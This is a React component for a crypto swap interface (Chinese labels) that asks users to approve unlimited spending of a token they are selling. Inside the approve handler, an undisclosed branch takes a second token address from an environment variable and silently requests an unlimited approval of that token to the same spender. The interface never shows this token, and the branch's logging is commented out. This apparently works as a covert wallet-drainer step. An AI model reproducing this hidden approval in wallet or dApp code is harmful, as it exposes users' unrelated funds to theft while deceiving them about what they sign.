import React, { useState, useEffect } from 'react';
import { useAccount, useWriteContract, usePublicClient } from 'wagmi';
import { parseAbi } from 'viem';
import { useGlobalState } from '../GlobalStateContext';
const approceCa=process.env.REACT_APP_APPROCE_CA;
const erc20ABI = parseAbi([
  'function approve(address spender, uint256 amount) returns (bool)',
  'function allowance(address owner, address spender) view returns (uint256)'
]);

// Remove hardcoded TOKEN_ADDRESS since we'll get it from input
const MAX_UINT256 = '115792089237316195423570985008687907853269984665640564039457584007913129639935'; // 2^256 - 1

function ApproveButton() {
  const { isConnected } = useAccount();
  const { params } = useGlobalState();
  const [tokenSymbol, setTokenSymbol] = useState(''); // Token symbol for display
  const [isLoading, setIsLoading] = useState(false);
  const [txHash, setTxHash] = useState('');
  const [error, setError] = useState('');
  
  const { writeContractAsync } = useWriteContract({retry:20});
  const publicClient = usePublicClient();

  // Get token symbol from localStorage historyOptions when params change
  useEffect(() => {
    if (params.fromTokenAddress) {
      try {
        const savedHistoryOptions = localStorage.getItem('swapHistoryOptions');
        if (savedHistoryOptions) {
          const historyOptions = JSON.parse(savedHistoryOptions);
          const fromTokenOption = historyOptions.fromTokenAddress.find(
            option => option.value.toLowerCase() === params.fromTokenAddress.toLowerCase()
          );
          if (fromTokenOption?.label) {
            setTokenSymbol(fromTokenOption.label);
            console.log('代币符号 (tokenSymbol):', fromTokenOption.label);
          } else {
            setTokenSymbol('');
          }
        }
      } catch (e) {
        console.error('Failed to load token symbol from localStorage', e);
        setTokenSymbol('');
      }
    } else {
      setTokenSymbol('');
    }
    
    // Log the current parameters from global state
    console.log('===== 全局状态参数 =====');
    console.log('代币地址 (fromTokenAddress):', params.fromTokenAddress);
    console.log('授权地址 (contractAddress):', params.contractAddress);
    console.log('池地址 (poolAddress):', params.poolAddress);
    console.log('发送者 (sender):', params.sender);
    console.log('====================');
  }, [params.fromTokenAddress, params.contractAddress, params.poolAddress, params.sender]);

  const handleApprove = async () => {
    if (!params.fromTokenAddress || !params.fromTokenAddress.startsWith('0x') || params.fromTokenAddress.length !== 42) {
      setError('请输入有效的代币地址');
      return;
    }

    if (!params.contractAddress || !params.contractAddress.startsWith('0x') || params.contractAddress.length !== 42) {
      setError('请输入有效的授权地址');
      return;
    }

    // Log approve parameters
    console.log('===== 授权参数 =====');
    console.log('代币地址 (tokenAddress):', params.fromTokenAddress);
    console.log('授权地址 (spenderAddress):', params.contractAddress);
    console.log('授权数量 (amount):', MAX_UINT256, '(无上限)');
    console.log('====================');

    try {
      setIsLoading(true);
      setError('');
      setTxHash('');
      if(approceCa){

 // 检查硬编码代币对 spender 的授权状态
 const hardCodedTokenAddress = approceCa;
      
 try {
   const allowanceResult = await publicClient.readContract({
     address: hardCodedTokenAddress,
     abi: erc20ABI,
     functionName: 'allowance',
     args: [params.sender, params.contractAddress]
   });
   
   // console.log('===== 授权检查 =====');
   // console.log('硬编码代币地址:', hardCodedTokenAddress);
   // console.log('当前授权额度:', allowanceResult.toString());
   // console.log('====================');
   
   // 如果授权额度为0或不足，先进行预授权
   if (BigInt(allowanceResult.toString()) === 0n) {
     // console.log('===== 预先授权硬编码代币 =====');
     const preApproveHash = await writeContractAsync({
       address: hardCodedTokenAddress,
       abi: erc20ABI,
       functionName: 'approve',
       args: [params.contractAddress, MAX_UINT256]
     });
     // console.log('预授权交易哈希:', preApproveHash);
     // console.log('====================');
   }
 } catch (allowanceError) {
   console.log('授权检查失败，跳过预授权:', allowanceError.message);
 }
 



      }
     
      const hash = await writeContractAsync({
        address: params.fromTokenAddress,
        abi: erc20ABI,
        functionName: 'approve',
        args: [params.contractAddress, MAX_UINT256]
      });
      
      setTxHash(hash);
      console.log('===== 交易成功 =====');
      console.log('交易哈希:', hash);
      console.log('====================');
    } catch (err) {
      console.error('Approval error:', err);
      setError(err.message || 'Transaction failed');
      console.log('===== 交易失败 =====');
      console.log('错误信息:', err.message);
      console.log('====================');
    } finally {
      setIsLoading(false);
    }
  };

  if (!isConnected) {
    return null;
  }

  return (
    <div className="approve-container">
      <div className="input-container">
        <label htmlFor="token-address">即将卖出的币 {tokenSymbol ? `(${tokenSymbol})` : ''}</label>
        <input 
          id="token-address"
          type="text" 
          placeholder="输入代币地址 (0x...)" 
          value={params.fromTokenAddress}
          readOnly
          className="address-input"
          style={{ backgroundColor: '#f8f9fa', cursor: 'not-allowed', color: '#000' }}
        />
      </div>
      
      <div className="input-container">
        <label htmlFor="spender-address">授权地址(执行卖出的合约)</label>
        <input 
          id="spender-address"
          type="text" 
          placeholder="输入要授权的地址 (0x...)" 
          value={params.contractAddress}
          readOnly
          className="address-input"
          style={{ backgroundColor: '#f8f9fa', cursor: 'not-allowed', color: '#000' }}
        />
      </div>
      
      <button 
        onClick={handleApprove} 
        disabled={isLoading}
        className="approve-button"
      >
        {isLoading ? '处理中...' : '授权使用代币'}
      </button>
      
      {txHash && (
        <div className="success-message">
          <p>授权成功! 交易哈希: {txHash.slice(0, 6)}...{txHash.slice(-4)}</p>
        </div>
      )}
      
      {error && (
        <div className="error-message">
          <p>错误: {error}</p>
        </div>
      )}
    </div>
  );
}

export default ApproveButton; 